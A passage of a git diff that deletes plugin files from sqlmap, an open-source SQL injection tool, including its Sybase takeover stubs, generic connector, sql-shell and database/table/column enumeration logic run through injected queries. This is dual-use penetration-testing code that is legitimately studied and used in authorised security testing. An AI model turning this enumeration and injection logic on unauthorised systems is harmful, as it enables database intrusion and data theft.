GenericSyntax.__init__(self) - - @staticmethod - def escape(expression, quote=True): - """ - >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") - 'SELECT CHAR(97)+CHAR(98)+CHAR(99)+CHAR(100)+CHAR(101)+CHAR(102)+CHAR(103)+CHAR(104) FROM foobar' - """ - - def escaper(value): - return "+".join("%s(%d)" % ("CHAR" if ord(value[i]) < 256 else "TO_UNICHAR", ord(value[i])) for i in xrange(len(value))) - - return Syntax._escape(expression, quote, escaper) diff --git a/plugins/dbms/sybase/takeover.py b/plugins/dbms/sybase/takeover.py deleted file mode 100644 index a57ee63e..00000000 --- a/plugins/dbms/sybase/takeover.py +++ /dev/null @@ -1,31 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.exception import SqlmapUnsupportedFeatureException -from plugins.generic.takeover import Takeover as GenericTakeover - -class Takeover(GenericTakeover): - def __init__(self): - GenericTakeover.__init__(self) - - def osCmd(self): - errMsg = "on Sybase it is not possible to execute commands" - raise SqlmapUnsupportedFeatureException(errMsg) - - def osShell(self): - errMsg = "on Sybase it is not possible to execute commands" - raise SqlmapUnsupportedFeatureException(errMsg) - - def osPwn(self): - errMsg = "on Sybase it is not possible to establish an " - errMsg += "out-of-band connection" - raise SqlmapUnsupportedFeatureException(errMsg) - - def osSmb(self): - errMsg = "on Sybase it is not possible to establish an " - errMsg += "out-of-band connection" - raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/generic/__init__.py b/plugins/generic/__init__.py deleted file mode 100644 index c2e45792..00000000 --- a/plugins/generic/__init__.py +++ /dev/null @@ -1,8 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -pass diff --git a/plugins/generic/connector.py b/plugins/generic/connector.py deleted file mode 100644 index 3e717a00..00000000 --- a/plugins/generic/connector.py +++ /dev/null @@ -1,81 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import os - -from lib.core.data import conf -from lib.core.data import logger -from lib.core.exception import SqlmapFilePathException -from lib.core.exception import SqlmapUndefinedMethod - -class Connector: - """ - This class defines generic dbms protocol functionalities for plugins. - """ - - def __init__(self): - self.connector = None - self.cursor = None - - def initConnection(self): - self.user = conf.dbmsUser - self.password = conf.dbmsPass if conf.dbmsPass is not None else "" - self.hostname = conf.hostname - self.port = conf.port - self.db = conf.dbmsDb - - def printConnected(self): - infoMsg = "connection to %s server %s" % (conf.dbms, self.hostname) - infoMsg += ":%d established" % self.port - logger.info(infoMsg) - - def closed(self): - infoMsg = "connection to %s server %s" % (conf.dbms, self.hostname) - infoMsg += ":%d closed" % self.port - logger.info(infoMsg) - - self.connector = None - self.cursor = None - - def initCursor(self): - self.cursor = self.connector.cursor() - - def close(self): - try: - if self.cursor: - self.cursor.close() - if self.connector: - self.connector.close() - except Exception, msg: - logger.debug(msg) - finally: - self.closed() - - def checkFileDb(self): - if not os.path.exists(self.db): - errMsg = "the provided database file '%s' does not exist" % self.db - raise SqlmapFilePathException(errMsg) - - def connect(self): - errMsg = "'connect' method must be defined " - errMsg += "into the specific DBMS plugin" - raise SqlmapUndefinedMethod(errMsg) - - def fetchall(self): - errMsg = "'fetchall' method must be defined " - errMsg += "into the specific DBMS plugin" - raise SqlmapUndefinedMethod(errMsg) - - def execute(self, query): - errMsg = "'execute' method must be defined " - errMsg += "into the specific DBMS plugin" - raise SqlmapUndefinedMethod(errMsg) - - def select(self, query): - errMsg = "'select' method must be defined " - errMsg += "into the specific DBMS plugin" - raise SqlmapUndefinedMethod(errMsg) diff --git a/plugins/generic/custom.py b/plugins/generic/custom.py deleted file mode 100644 index 86825cea..00000000 --- a/plugins/generic/custom.py +++ /dev/null @@ -1,136 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import re -import sys - -from lib.core.common import Backend -from lib.core.common import dataToStdout -from lib.core.common import getSQLSnippet -from lib.core.common import getUnicode -from lib.core.common import isStackingAvailable -from lib.core.data import conf -from lib.core.data import logger -from lib.core.dicts import SQL_STATEMENTS -from lib.core.enums import AUTOCOMPLETE_TYPE -from lib.core.exception import SqlmapNoneDataException -from lib.core.settings import NULL -from lib.core.settings import PARAMETER_SPLITTING_REGEX -from lib.core.shell import autoCompletion -from lib.request import inject - -class Custom: - """ - This class defines custom enumeration functionalities for plugins. - """ - - def __init__(self): - pass - - def sqlQuery(self, query): - output = None - sqlType = None - query = query.rstrip(';') - - try: - for sqlTitle, sqlStatements in SQL_STATEMENTS.items(): - for sqlStatement in sqlStatements: - if query.lower().startswith(sqlStatement): - sqlType = sqlTitle - break - - if not any(_ in query.upper() for _ in ("OPENROWSET", "INTO")) and (not sqlType or "SELECT" in sqlType): - infoMsg = "fetching %s query output: '%s'" % (sqlType if sqlType is not None else "SQL", query) - logger.info(infoMsg) - - output = inject.getValue(query, fromUser=True) - - return output - elif not isStackingAvailable() and not conf.direct: - warnMsg = "execution of custom SQL queries is only " - warnMsg += "available when stacked queries are supported" - logger.warn(warnMsg) - - return None - else: - if sqlType: - debugMsg = "executing %s query: '%s'" % (sqlType if sqlType is not None else "SQL", query) - else: - debugMsg = "executing unknown SQL type query: '%s'" % query - logger.debug(debugMsg) - - inject.goStacked(query) - - debugMsg = "done" - logger.debug(debugMsg) - - output = NULL - - except SqlmapNoneDataException, ex: - logger.warn(ex) - - return output - - def sqlShell(self): - infoMsg = "calling %s shell. To quit type " % Backend.getIdentifiedDbms() - infoMsg += "'x' or 'q' and press ENTER" - logger.info(infoMsg) - - autoCompletion(AUTOCOMPLETE_TYPE.SQL) - - while True: - query = None - - try: - query = raw_input("sql-shell> ") - query = getUnicode(query, encoding=sys.stdin.encoding) - except KeyboardInterrupt: - print - errMsg = "user aborted" - logger.error(errMsg) - except EOFError: - print - errMsg = "exit" - logger.error(errMsg) - break - - if not query: - continue - - if query.lower() in ("x", "q", "exit", "quit"): - break - - output = self.sqlQuery(query) - - if output and output != "Quit": - conf.dumper.query(query, output) - - elif not output: - pass - - elif output != "Quit": - dataToStdout("No output\n") - - def sqlFile(self): - infoMsg = "executing SQL statements from given file(s)" - logger.info(infoMsg) - - for sfile in re.split(PARAMETER_SPLITTING_REGEX, conf.sqlFile): - sfile = sfile.strip() - - if not sfile: - continue - - snippet = getSQLSnippet(Backend.getDbms(), sfile) - - if snippet and all(query.strip().upper().startswith("SELECT") for query in filter(None, snippet.split(';' if ';' in snippet else '\n'))): - for query in filter(None, snippet.split(';' if ';' in snippet else '\n')): - query = query.strip() - if query: - conf.dumper.query(query, self.sqlQuery(query)) - else: - conf.dumper.query(snippet, self.sqlQuery(snippet)) diff --git a/plugins/generic/databases.py b/plugins/generic/databases.py deleted file mode 100644 index d35ff8b7..00000000 --- a/plugins/generic/databases.py +++ /dev/null @@ -1,840 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.agent import agent -from lib.core.common import arrayizeValue -from lib.core.common import Backend -from lib.core.common import filterPairValues -from lib.core.common import flattenValue -from lib.core.common import getLimitRange -from lib.core.common import isInferenceAvailable -from lib.core.common import isListLike -from lib.core.common import isNoneValue -from lib.core.common import isNumPosStrValue -from lib.core.common import isTechniqueAvailable -from lib.core.common import parseSqliteTableSchema -from lib.core.common import popValue -from lib.core.common import pushValue -from lib.core.common import readInput -from lib.core.common import safeSQLIdentificatorNaming -from lib.core.common import singleTimeWarnMessage -from lib.core.common import unArrayizeValue -from lib.core.common import unsafeSQLIdentificatorNaming -from lib.core.data import conf -from lib.core.data import kb -from lib.core.data import logger -from lib.core.data import paths -from lib.core.data import queries -from lib.core.dicts import FIREBIRD_TYPES -from lib.core.enums import CHARSET_TYPE -from lib.core.enums import DBMS -from lib.core.enums import EXPECTED -from lib.core.enums import PAYLOAD -from lib.core.exception import SqlmapMissingMandatoryOptionException -from lib.core.exception import SqlmapNoneDataException -from lib.core.exception import SqlmapUserQuitException -from lib.core.settings import CURRENT_DB -from lib.request import inject -from lib.techniques.brute.use import columnExists -from lib.techniques.brute.use import tableExists - -class Databases: - """ - This class defines databases' enumeration functionalities for plugins. - """ - - def __init__(self): - kb.data.currentDb = "" - kb.data.cachedDbs = [] - kb.data.cachedTables = {} - kb.data.cachedColumns = {} - kb.data.cachedCounts = {} - kb.data.dumpedTable = {} - - def getCurrentDb(self): - infoMsg = "fetching current database" - logger.info(infoMsg) - - query = queries[Backend.getIdentifiedDbms()].current_db.query - - if not kb.data.currentDb: - kb.data.currentDb = unArrayizeValue(inject.getValue(query, safeCharEncode=False)) - - if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.PGSQL): - warnMsg = "on %s you'll need to use " % Backend.getIdentifiedDbms() - warnMsg += "schema names for enumeration as the counterpart to database " - warnMsg += "names on other DBMSes" - singleTimeWarnMessage(warnMsg) - - return kb.data.currentDb - - def getDbs(self): - if len(kb.data.cachedDbs) > 0: - return kb.data.cachedDbs - - infoMsg = None - - if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema: - warnMsg = "information_schema not available, " - warnMsg += "back-end DBMS is MySQL < 5. database " - warnMsg += "names will be fetched from 'mysql' database" - logger.warn(warnMsg) - - elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.PGSQL): - warnMsg = "schema names are going to be used on %s " % Backend.getIdentifiedDbms() - warnMsg += "for enumeration as the counterpart to database " - warnMsg += "names on other DBMSes" - logger.warn(warnMsg) - - infoMsg = "fetching database (schema) names" - - else: - infoMsg = "fetching database names" - - if infoMsg: - logger.info(infoMsg) - - rootQuery = queries[Backend.getIdentifiedDbms()].dbs - - if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: - if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema: - query = rootQuery.inband.query2 - else: - query = rootQuery.inband.query - values = inject.getValue(query, blind=False, time=False) - - if not isNoneValue(values): - kb.data.cachedDbs = arrayizeValue(values) - - if not kb.data.cachedDbs and isInferenceAvailable() and not conf.direct: - infoMsg = "fetching number of databases" - logger.info(infoMsg) - - if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema: - query = rootQuery.blind.count2 - else: - query = rootQuery.blind.count - count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) - - if not isNumPosStrValue(count): - errMsg = "unable to retrieve the number of databases" - logger.error(errMsg) - else: - plusOne = Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2) - indexRange = getLimitRange(count, plusOne=plusOne) - - for index in indexRange: - if Backend.isDbms(DBMS.SYBASE): - query = rootQuery.blind.query % (kb.data.cachedDbs[-1] if kb.data.cachedDbs else " ") - elif Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema: - query = rootQuery.blind.query2 % index - else: - query = rootQuery.blind.query % index - db = unArrayizeValue(inject.getValue(query, union=False, error=False)) - - if db: - kb.data.cachedDbs.append(safeSQLIdentificatorNaming(db)) - - if not kb.data.cachedDbs and Backend.isDbms(DBMS.MSSQL): - if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: - blinds = (False, True) - else: - blinds = (True,) - - for blind in blinds: - count = 0 - kb.data.cachedDbs = [] - while True: - query = rootQuery.inband.query2 % count - value = unArrayizeValue(inject.getValue(query, blind=blind)) - if not (value or "").strip(): - break - else: - kb.data.cachedDbs.append(value) - count += 1 - if kb.data.cachedDbs: - break - - if not kb.data.cachedDbs: - infoMsg = "falling back to current database" - logger.info(infoMsg) - self.getCurrentDb() - - if kb.data.currentDb: - kb.data.cachedDbs = [kb.data.currentDb] - else: - errMsg = "unable to retrieve the database names" - raise SqlmapNoneDataException(errMsg) - else: - kb.data.cachedDbs.sort() - - if kb.data.cachedDbs: - kb.data.cachedDbs = filter(None, list(set(flattenValue(kb.data.cachedDbs)))) - - return kb.data.cachedDbs - - def getTables(self, bruteForce=None): - if len(kb.data.cachedTables) > 0: - return kb.data.cachedTables - - self.forceDbmsEnum() - - if bruteForce is None: - if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema: - errMsg = "information_schema not available, " - errMsg += "back-end DBMS is MySQL < 5.0" - logger.error(errMsg) - bruteForce = True - - elif Backend.isDbms(DBMS.ACCESS): - try: - tables = self.getTables(False) - except SqlmapNoneDataException: - tables = None - - if not tables: - errMsg = "cannot retrieve table names, " - errMsg += "back-end DBMS is Access" - logger.error(errMsg) - bruteForce = True - else: - return tables - - if conf.db == CURRENT_DB: - conf.db = self.getCurrentDb() - - if conf.db and Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.HSQLDB): - conf.db = conf.db.upper() - - if conf.db: - dbs = conf.db.split(",") - else: - dbs = self.getDbs() - - dbs = [_ for _ in dbs if _ and _.strip()] - - for db in dbs: - dbs[dbs.index(db)] = safeSQLIdentificatorNaming(db) - - if bruteForce: - resumeAvailable = False - - for db, table in kb.brute.tables: - if db == conf.db: - resumeAvailable = True - break - - if resumeAvailable and not conf.freshQueries: - for db, table in kb.brute.tables: - if db == conf.db: - if conf.db not in kb.data.cachedTables: - kb.data.cachedTables[conf.db] = [table] - else: - kb.data.cachedTables[conf.db].append(table) - - return kb.data.cachedTables - - message = "do you want to use common table existence check? %s " % ("[Y/n/q]" if Backend.getIdentifiedDbms() in (DBMS.ACCESS,) else "[y/N/q]") - test = readInput(message, default="Y" if "Y" in message else "N") - - if test[0] in ("n", "N"): - return - elif test[0] in ("q", "Q"): - raise SqlmapUserQuitException - else: - return tableExists(paths.COMMON_TABLES) - - infoMsg = "fetching tables for database" - infoMsg += "%s: '%s'" % ("s" if len(dbs) > 1 else "", ", ".join(unsafeSQLIdentificatorNaming(unArrayizeValue(db)) for db in sorted(dbs))) - logger.info(infoMsg) - - rootQuery = queries[Backend.getIdentifiedDbms()].tables - - if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: - query = rootQuery.inband.query - condition = rootQuery.inband.condition if 'condition' in rootQuery.inband else None - - if condition: - if not Backend.isDbms(DBMS.SQLITE): - query += " WHERE %s" % condition - - if conf.excludeSysDbs: - infoMsg = "skipping system database%s '%s'" % ("s" if len(self.excludeDbsList) > 1 else "", ", ".join(unsafeSQLIdentificatorNaming(db) for db in self.excludeDbsList)) - logger.info(infoMsg) - query += " IN (%s)" % ",".join("'%s'" % unsafeSQLIdentificatorNaming(db) for db in sorted(dbs) if db not in self.excludeDbsList) - else: - query += " IN (%s)" % ",".join("'%s'" % unsafeSQLIdentificatorNaming(db) for db in sorted(dbs)) - - if len(dbs) < 2 and ("%s," % condition) in query: - query = query.replace("%s," % condition, "", 1) - - values = inject.getValue(query, blind=False, time=False) - - if not isNoneValue(values): - values = filter(None, arrayizeValue(values)) - - if len(values) > 0 and not isListLike(values[0]): - values = [(dbs[0], _) for _ in values] - - for db, table in filterPairValues(values): - db = safeSQLIdentificatorNaming(db) - table = safeSQLIdentificatorNaming(unArrayizeValue(table), True) - - if db not in kb.data.cachedTables: - kb.data.cachedTables[db] = [table] - else: - kb.data.cachedTables[db].append(table) - - if not kb.data.cachedTables and isInferenceAvailable() and not conf.direct: - for db in dbs: - if conf.excludeSysDbs and db in self.excludeDbsList: - infoMsg = "skipping system database '%s'" % unsafeSQLIdentificatorNaming(db) - logger.info(infoMsg) - - continue - - infoMsg = "fetching number of tables for " - infoMsg += "database '%s'" % unsafeSQLIdentificatorNaming(db) - logger.info(infoMsg) - - if Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.FIREBIRD, DBMS.MAXDB, DBMS.ACCESS): - query = rootQuery.blind.count - else: - query = rootQuery.blind.count % unsafeSQLIdentificatorNaming(db) - - count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) - - if count == 0: - warnMsg = "database '%s' " % unsafeSQLIdentificatorNaming(db) - warnMsg += "appears to be empty" - logger.warn(warnMsg) - continue - - elif not isNumPosStrValue(count): - warnMsg = "unable to retrieve the number of " - warnMsg += "tables for database '%s'" % unsafeSQLIdentificatorNaming(db) - logger.warn(warnMsg) - continue - - tables = [] - - plusOne = Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2) - indexRange = getLimitRange(count, plusOne=plusOne) - - for index in indexRange: - if Backend.isDbms(DBMS.SYBASE): - query = rootQuery.blind.query % (db, (kb.data.cachedTables[-1] if kb.data.cachedTables else " ")) - elif Backend.getIdentifiedDbms() in (DBMS.MAXDB, DBMS.ACCESS): - query = rootQuery.blind.query % (kb.data.cachedTables[-1] if kb.data.cachedTables else " ") - elif Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.FIREBIRD): - query = rootQuery.blind.query % index - elif Backend.isDbms(DBMS.HSQLDB): - query = rootQuery.blind.query % (index, unsafeSQLIdentificatorNaming(db)) - else: - query = rootQuery.blind.query % (unsafeSQLIdentificatorNaming(db), index) - - table = unArrayizeValue(inject.getValue(query, union=False, error=False)) - if not isNoneValue(table): - kb.hintValue = table - table = safeSQLIdentificatorNaming(table, True) - tables.append(table) - - if tables: - kb.data.cachedTables[db] = tables - else: - warnMsg = "unable to retrieve the table names " - warnMsg += "for database '%s'" % unsafeSQLIdentificatorNaming(db) - logger.warn(warnMsg) - - if isNoneValue(kb.data.cachedTables): - kb.data.cachedTables.clear() - - if not kb.data.cachedTables: - errMsg = "unable to retrieve the table names for any database" - if bruteForce is None: - logger.error(errMsg) - return self.getTables(bruteForce=True) - elif not conf.search: - raise SqlmapNoneDataException(errMsg) - else: - for db, tables in kb.data.cachedTables.items(): - kb.data.cachedTables[db] = sorted(tables) if tables else tables - - if kb.data.cachedTables: - for db in kb.data.cachedTables.keys(): - kb.data.cachedTables[db] = list(set(kb.data.cachedTables[db])) - - return kb.data.cachedTables - - def getColumns(self, onlyColNames=False, colTuple=None, bruteForce=None, dumpMode=False): - self.forceDbmsEnum() - - if conf.db is None or conf.db == CURRENT_DB: - if conf.db is None: - warnMsg = "missing database parameter. sqlmap is going " - warnMsg += "to use the current database to enumerate " - warnMsg += "table(s) columns" - logger.warn(warnMsg) - - conf.db = self.getCurrentDb() - - if not conf.db: - errMsg = "unable to retrieve the current " - errMsg += "database name" - raise SqlmapNoneDataException(errMsg) - - elif conf.db is not None: - if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.HSQLDB): - conf.db = conf.db.upper() - - if ',' in conf.db: - errMsg = "only one database name is allowed when enumerating " - errMsg += "the tables' columns" - raise SqlmapMissingMandatoryOptionException(errMsg) - - conf.db = safeSQLIdentificatorNaming(conf.db) - - if conf.col: - if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): - conf.col = conf.col.upper() - - colList = conf.col.split(',') - else: - colList = [] - - if conf.excludeCol: - colList = [_ for _ in colList if _ not in conf.excludeCol.split(',')] - - for col in colList: - colList[colList.index(col)] = safeSQLIdentificatorNaming(col) - - colList = filter(None, colList) - - if conf.tbl: - if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.HSQLDB): - conf.tbl = conf.tbl.upper() - - tblList = conf.tbl.split(",") - else: - self.getTables() - - if len(kb.data.cachedTables) > 0: - if conf.db in kb.data.cachedTables: - tblList = kb.data.cachedTables[conf.db] - else: - tblList = kb.data.cachedTables.values() - - if isinstance(tblList[0], (set, tuple, list)): - tblList = tblList[0] - - tblList = list(tblList) - elif not conf.search: - errMsg = "unable to retrieve the tables " - errMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(conf.db) - raise SqlmapNoneDataException(errMsg) - else: - return kb.data.cachedColumns - - tblList = filter(None, (safeSQLIdentificatorNaming(_, True) for _ in tblList)) - - if bruteForce is None: - if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema: - errMsg = "information_schema not available, " - errMsg += "back-end DBMS is MySQL < 5.0" - logger.error(errMsg) - bruteForce = True - - elif Backend.isDbms(DBMS.ACCESS): - errMsg = "cannot retrieve column names, " - errMsg += "back-end DBMS is Access" - logger.error(errMsg) - bruteForce = True - - if bruteForce: - resumeAvailable = False - - for tbl in tblList: - for db, table, colName, colType in kb.brute.columns: - if db == conf.db and table == tbl: - resumeAvailable = True - break - - if resumeAvailable and not conf.freshQueries or colList: - columns = {} - - for column in colList: - columns[column] = None - - for tbl in tblList: - for db, table, colName, colType in kb.brute.columns: - if db == conf.db and table == tbl: - columns[colName] = colType - - if conf.db in kb.data.cachedColumns: - kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)][safeSQLIdentificatorNaming(tbl, True)] = columns - else: - kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)] = {safeSQLIdentificatorNaming(tbl, True): columns} - - return kb.data.cachedColumns - - message = "do you want to use common column existence check? %s" % ("[Y/n/q]" if Backend.getIdentifiedDbms() in (DBMS.ACCESS,) else "[y/N/q]") - test = readInput(message, default="Y" if "Y" in message else "N") - - if test[0] in ("n", "N"): - return - elif test[0] in ("q", "Q"): - raise SqlmapUserQuitException - else: - return columnExists(paths.COMMON_COLUMNS) - - rootQuery = queries[Backend.getIdentifiedDbms()].columns - condition = rootQuery.blind.condition if 'condition' in rootQuery.blind else None - - if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: - for tbl in tblList: - if conf.db is not None and len(kb.data.cachedColumns) > 0 \ - and conf.db in kb.data.cachedColumns and tbl in \ - kb.data.cachedColumns[conf.db]: - infoMsg = "fetched tables' columns on " - infoMsg += "database '%s'" % unsafeSQLIdentificatorNaming(conf.db) - logger.info(infoMsg) - - return {conf.db: kb.data.cachedColumns[conf.db]} - - infoMsg = "fetching columns " - condQuery = "" - - if len(colList) > 0: - if colTuple: - _, colCondParam = colTuple - infoMsg += "LIKE '%s' " % ", ".join(unsafeSQLIdentificatorNaming(col) for col in sorted(colList)) - else: - colCondParam = "='%s'" - infoMsg += "'%s' " % ", ".join(unsafeSQLIdentificatorNaming(col) for col in sorted(colList)) - - condQueryStr = "%%s%s" % colCondParam - condQuery = " AND (%s)" % " OR ".join(condQueryStr % (condition, unsafeSQLIdentificatorNaming(col)) for col in sorted(colList)) - - if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB): - query = rootQuery.inband.query % (unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(conf.db)) - query += condQuery - elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): - query = rootQuery.inband.query % (unsafeSQLIdentificatorNaming(tbl.upper()), unsafeSQLIdentificatorNaming(conf.db.upper())) - query += condQuery - elif Backend.isDbms(DBMS.MSSQL): - query = rootQuery.inband.query % (conf.db, conf.db, conf.db, conf.db, - conf.db, conf.db, conf.db, unsafeSQLIdentificatorNaming(tbl).split(".")[-1]) - query += condQuery.replace("[DB]", conf.db) - elif Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.FIREBIRD): - query = rootQuery.inband.query % tbl - - if dumpMode and colList: - values = [(_,) for _ in colList] - else: - infoMsg += "for table '%s' " % unsafeSQLIdentificatorNaming(tbl) - infoMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(conf.db) - logger.info(infoMsg) - - values = inject.getValue(query, blind=False, time=False) - - if Backend.isDbms(DBMS.MSSQL) and isNoneValue(values): - index, values = 1, [] - - while True: - query = rootQuery.inband.query2 % (conf.db, tbl, index) - value = unArrayizeValue(inject.getValue(query, blind=False, time=False)) - - if isNoneValue(value) or value == " ": - break - else: - values.append((value,)) - index += 1 - - if Backend.isDbms(DBMS.SQLITE): - parseSqliteTableSchema(unArrayizeValue(values)) - elif not isNoneValue(values): - table = {} - columns = {} - - for columnData in values: - if not isNoneValue(columnData): - name = safeSQLIdentificatorNaming(columnData[0]) - - if name: - if conf.getComments: - _ = queries[Backend.getIdentifiedDbms()].column_comment - if hasattr(_, "query"): - if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): - query = _.query % (unsafeSQLIdentificatorNaming(conf.db.upper()), unsafeSQLIdentificatorNaming(tbl.upper()), unsafeSQLIdentificatorNaming(name.upper())) - else: - query = _.query % (unsafeSQLIdentificatorNaming(conf.db), unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(name)) - comment = unArrayizeValue(inject.getValue(query, blind=False, time=False)) - else: - warnMsg = "on %s it is not " % Backend.getIdentifiedDbms() - warnMsg += "possible to get column comments" - singleTimeWarnMessage(warnMsg) - - if len(columnData) == 1: - columns[name] = None - else: - if Backend.isDbms(DBMS.FIREBIRD): - columnData[1] = FIREBIRD_TYPES.get(int(columnData[1]) if isinstance(columnData[1], basestring) and columnData[1].isdigit() else columnData[1], columnData[1]) - - columns[name] = columnData[1] - - if conf.db in kb.data.cachedColumns: - kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)][safeSQLIdentificatorNaming(tbl, True)] = columns - else: - table[safeSQLIdentificatorNaming(tbl, True)] = columns - kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)] = table - - elif isInferenceAvailable() and not conf.direct: - for tbl in tblList: - if conf.db is not None and len(kb.data.cachedColumns) > 0 \ - and conf.db in kb.data.cachedColumns and tbl in \ - kb.data.cachedColumns[conf.db]: - infoMsg = "fetched tables' columns on " - infoMsg += "database '%s'" % unsafeSQLIdentificatorNaming(conf.db) - logger.info(infoMsg) - - return {conf.db: kb.data.cachedColumns[conf.db]} - - infoMsg = "fetching columns " - condQuery = "" - - if len(colList) > 0: - if colTuple: - _, colCondParam = colTuple - infoMsg += "LIKE '%s' " % ", ".join(unsafeSQLIdentificatorNaming(col) for col in sorted(colList)) - else: - colCondParam = "='%s'" - infoMsg += "'%s' " % ", ".join(unsafeSQLIdentificatorNaming(col) for col in sorted(colList)) - - condQueryStr = "%%s%s" % colCondParam - condQuery = " AND (%s)" % " OR ".join(condQueryStr % (condition, unsafeSQLIdentificatorNaming(col)) for col in sorted(colList)) - - if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB): - query = rootQuery.blind.count % (unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(conf.db)) - query += condQuery - - elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): - query = rootQuery.blind.count % (unsafeSQLIdentificatorNaming(tbl.upper()), unsafeSQLIdentificatorNaming(conf.db.upper())) - query += condQuery - - elif Backend.isDbms(DBMS.MSSQL): - query = rootQuery.blind.count % (conf.db, conf.db, \ - unsafeSQLIdentificatorNaming(tbl).split(".")[-1]) - query += condQuery.replace("[DB]", conf.db) - - elif Backend.isDbms(DBMS.FIREBIRD): - query = rootQuery.blind.count % (tbl) - query += condQuery - - elif Backend.isDbms(DBMS.SQLITE): - query = rootQuery.blind.query % tbl - value = unArrayizeValue(inject.getValue(query, union=False, error=False)) - parseSqliteTableSchema(value) - return kb.data.cachedColumns - - table = {} - columns = {} - - if dumpMode and colList: - count = 0 - for value in colList: - columns[safeSQLIdentificatorNaming(value)] = None - else: - infoMsg += "for table '%s' " % unsafeSQLIdentificatorNaming(tbl) - infoMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(conf.db) - logger.info(infoMsg) - - count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) - - if not isNumPosStrValue(count): - if Backend.isDbms(DBMS.MSSQL): - count, index, values = 0, 1, [] - while True: - query = rootQuery.blind.query3 % (conf.db, tbl, index) - value = unArrayizeValue(inject.getValue(query, union=False, error=False)) - if isNoneValue(value) or value == " ": - break - else: - columns[safeSQLIdentificatorNaming(value)] = None - index += 1 - - if not columns: - errMsg = "unable to retrieve the %scolumns " % ("number of " if not Backend.isDbms(DBMS.MSSQL) else "") - errMsg += "for table '%s' " % unsafeSQLIdentificatorNaming(tbl) - errMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(conf.db) - logger.error(errMsg) - continue - - for index in getLimitRange(count): - if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB): - query = rootQuery.blind.query % (unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(conf.db)) - query += condQuery - field = None - elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): - query = rootQuery.blind.query % (unsafeSQLIdentificatorNaming(tbl.upper()), unsafeSQLIdentificatorNaming(conf.db.upper())) - query += condQuery - field = None - elif Backend.isDbms(DBMS.MSSQL): - query = rootQuery.blind.query.replace("'%s'", "'%s'" % unsafeSQLIdentificatorNaming(tbl).split(".")[-1]).replace("%s", conf.db).replace("%d", str(index)) - query += condQuery.replace("[DB]", conf.db) - field = condition.replace("[DB]", conf.db) - elif Backend.isDbms(DBMS.FIREBIRD): - query = rootQuery.blind.query % (tbl) - query += condQuery - field = None - - query = agent.limitQuery(index, query, field, field) 